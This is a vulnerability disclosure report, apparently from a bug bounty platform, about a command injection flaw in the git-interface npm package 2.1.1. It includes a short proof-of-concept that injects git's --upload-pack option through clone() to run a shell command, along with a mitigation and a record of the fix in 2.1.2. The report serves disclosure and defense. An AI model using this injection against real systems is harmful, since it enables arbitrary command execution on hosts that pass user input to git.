Command Injection vulnerability in git-interface@2.1.1 in yarkeev/git-interface

Valid

Reported on

Apr 16th 2022


Command Injection vulnerability in git-interface@2.1.1

git-interface describes itself as an "Interface to work with a git repository in node.js".

Resources:

  • Project's GitHub source code: https://github.com/yarkeev/git-interface
  • Project's npm package: https://www.npmjs.com/package/git-interface

I'm reporting an OS Command Injection vulnerability in the git-interface npm package. The API may be abused if user input is able to point at a valid directory on disk and also supply the destination directory to clone a repository to.

Proof of Concept exploit

Install git-interface@2.1.1 which is the latest.

Run the following code, with the precondition that the /tmp/new directory exists (it does not need to be a .git initialized directory), so you could equally provide a predictable path such as /usr/src:

const { Git } = require('git-interface');

const git = new Git({
    dir: '/tmp/new' // default path is the current directory
});

git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');

Observe a new file created: /tmp/pwned

Mitigation suggestions

Use the -- separator as a suffix to the supported command-line arguments (if any), so that input passed to the git command is treated as positional arguments rather than command-line options. For example: git clone -- <path> <destination> prevents path and destination from being interpreted as command-line options to the git command.

Author

Liran Tal

Impact

If both the repository path and the destination are provided by user input, then git's --upload-pack command-line argument, which git clone also supports, can be injected, allowing the attacker to spawn any operating system command.

We are processing your report and will contact the yarkeev/git-interface team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the yarkeev/git-interface team and are waiting to hear back a year ago
We have sent a follow up to the yarkeev/git-interface team. We will try again in 7 days. a year ago
yarkeev validated this vulnerability a year ago
Liran Tal has been awarded the disclosure bounty
The fix bounty is now up for grabs
yarkeev marked this as fixed in 2.1.2 with commit f828aa a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE